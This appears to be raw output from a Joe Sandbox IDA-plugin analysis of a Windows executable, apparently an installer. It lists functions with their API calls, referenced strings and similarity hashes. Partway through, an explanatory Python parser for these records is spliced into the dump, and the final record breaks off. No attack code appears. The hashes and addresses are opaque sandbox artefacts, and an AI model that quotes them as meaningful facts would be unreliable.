                                                              • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                              • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                              • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                              • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                              APIs
                                                              • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                              • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                              • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                              Similarity
                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                              • String ID:
                                                              • API String ID: 4025006896-0
                                                              • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                              • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                              • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                              • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                              APIs
                                                              • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                              • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                              Similarity
                                                              • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                              • String ID:
                                                              • API String ID: 4071923889-0
                                                              • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                              • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                              • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                              • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                              APIs
                                                              • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                              • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                              • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                              • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                              • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                              • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                              • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                              APIs
                                                              • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                              • String ID:
                                                              • API String ID: 730355536-0
                                                              • Opcode ID: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                              • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                              • Opcode Fuzzy Hash: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                              • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                              Strings
                                                              • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                              • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                              • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                              • API String ID: 1452528299-3038984924
                                                              • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                              • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                              • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                              • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                              Strings
                                                              • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                              • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                              • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                              • API String ID: 1452528299-1392080489
                                                              • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                              • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                              • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                              • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                              • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                              • String ID:
                                                              • API String ID: 4283692357-0
                                                              • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                              • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                              • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                              • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CountSleepTick
                                                              • String ID:
                                                              • API String ID: 2227064392-0
                                                              • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                              • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                              • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                              • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                              • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                              • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                              • String ID:
                                                              • API String ID: 215268677-0
                                                              • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                              • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                              • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                              • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                              APIs
                                                              • GetLastActivePopup.USER32(?), ref: 0042424C
                                                              • IsWindowVisible.USER32(?), ref: 0042425D
                                                              • IsWindowEnabled.USER32(?), ref: 00424267
                                                              • SetForegroundWindow.USER32(?), ref: 00424271
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                              • String ID:
                                                              • API String ID: 2280970139-0
                                                              • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                              • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                              • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                              • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                              APIs
                                                              • GlobalHandle.KERNEL32 ref: 0040626F
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                              • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                              • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocHandleLockUnlock
                                                              • String ID:
                                                              • API String ID: 2167344118-0
                                                              • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                              • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                              • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                              • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                              APIs
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                              Strings
                                                              • Failed to parse "reg" constant, xrefs: 0047A480
                                                              • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                              • API String ID: 3535843008-1938159461
                                                              • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                              • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                              • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                              • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                              • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                              Strings
                                                              • Will not restart Windows automatically., xrefs: 004836F6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveForeground
                                                              • String ID: Will not restart Windows automatically.
                                                              • API String ID: 307657957-4169339592
                                                              • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                              • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                              • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                              • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                              APIs
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                              • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                              Strings
                                                              • Extracting temporary file: , xrefs: 004763EC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileTime$Local
                                                              • String ID: Extracting temporary file:
                                                              • API String ID: 791338737-4171118009
                                                              • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                              • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                              • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                              • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
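The function records in this report all follow the same layout (APIs with call-site addresses, Strings with xrefs, Memory Dump Source, Joe Sandbox IDA Plugin snapshot, Similarity fields ending in the Instruction Fuzzy Hash). The parser below turns that text into Python objects so the API IDs, referenced strings and fuzzy hashes can be searched or exported for cross-sample matching. It is an example added to this page, not Joe Sandbox or IDA plugin code; the embedded sample input is a constructed, abridged copy of two records from this report (argument lists shortened, most Associated lines dropped), and the helper names are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin function records into searchable objects.
Added example, not Joe Sandbox tooling; layout taken from this report."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records from this report, abridged (argument
# lists shortened, most "Associated:" lines dropped).
SAMPLE_REPORT = """\
APIs
• RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82), ref: 004019E2
• LocalAlloc.KERNEL32(00000000,00000FF8,0049B420), ref: 00401A1F
• RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89), ref: 00401A7C
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID:
• API String ID: 730355536-0
• Opcode ID: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
• Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
APIs
• GetLastError.KERNEL32(?,00000000), ref: 004705F1
Strings
• Unsetting NTFS compression on file: %s, xrefs: 004705D7
• Failed to set NTFS compression state (%d)., xrefs: 00470602
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Unsetting NTFS compression on file: %s
• API String ID: 1452528299-3038984924
• Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
• Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity"}
# "<name>.<module>(<args>), ref: <addr>"; the argument list may be absent
# (e.g. "GlobalHandle.KERNEL32 ref: 0040626F") and the line may be a subcall.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str                # address of the call site
    subcall_of: str = None  # set for "Part of subcall function X" lines

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (text, xref address)
    source: dict = field(default_factory=dict)      # Source File / Associated / Snapshot File
    similarity: dict = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes ...

def parse_api_line(text):
    m = API_LINE.match(text)
    if not m:
        raise ValueError(f"unrecognised API line: {text!r}")
    args = m["args"].split(",") if m["args"] else []
    return ApiCall(m["name"], m["module"], args, m["ref"], m["sub"])

def parse_report(text):
    """Split plugin output into records; each record ends at its Instruction Fuzzy Hash."""
    records, rec, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs":
            rec.apis.append(parse_api_line(item))
        elif section == "Strings":
            s, _, xref = item.rpartition(", xrefs: ")
            rec.strings.append((s, xref))
        elif section is not None:
            key, _, value = item.partition(":")
            key, value = key.strip(), value.strip()
            if section == "Similarity":
                rec.similarity[key] = value
                if key == "Instruction Fuzzy Hash":   # last field of a record
                    records.append(rec)
                    rec = FunctionRecord()
            else:
                rec.source.setdefault(key, []).append(value)
    return records

def records_calling(records, api_name):
    """Records whose API list mentions api_name, directly or via a subcall."""
    return [r for r in records if any(a.name == api_name for a in r.apis)]

def fuzzy_hash_index(records):
    """API ID -> instruction fuzzy hashes, for matching functions across samples."""
    idx = {}
    for r in records:
        idx.setdefault(r.similarity.get("API ID", ""), []).append(
            r.similarity["Instruction Fuzzy Hash"])
    return idx
```

Feed `parse_report` the text of the whole record list (copied from the report) and use `records_calling` to pull out, for instance, every function that reaches `GetTokenInformation` or `RegDeleteValueA`; `fuzzy_hash_index` gives the per-API-ID hash lists you would compare against another report of the same family.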
                                                              Strings
                                                              • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                              • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                              • API String ID: 0-1974262853
                                                              • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                              • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                              • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
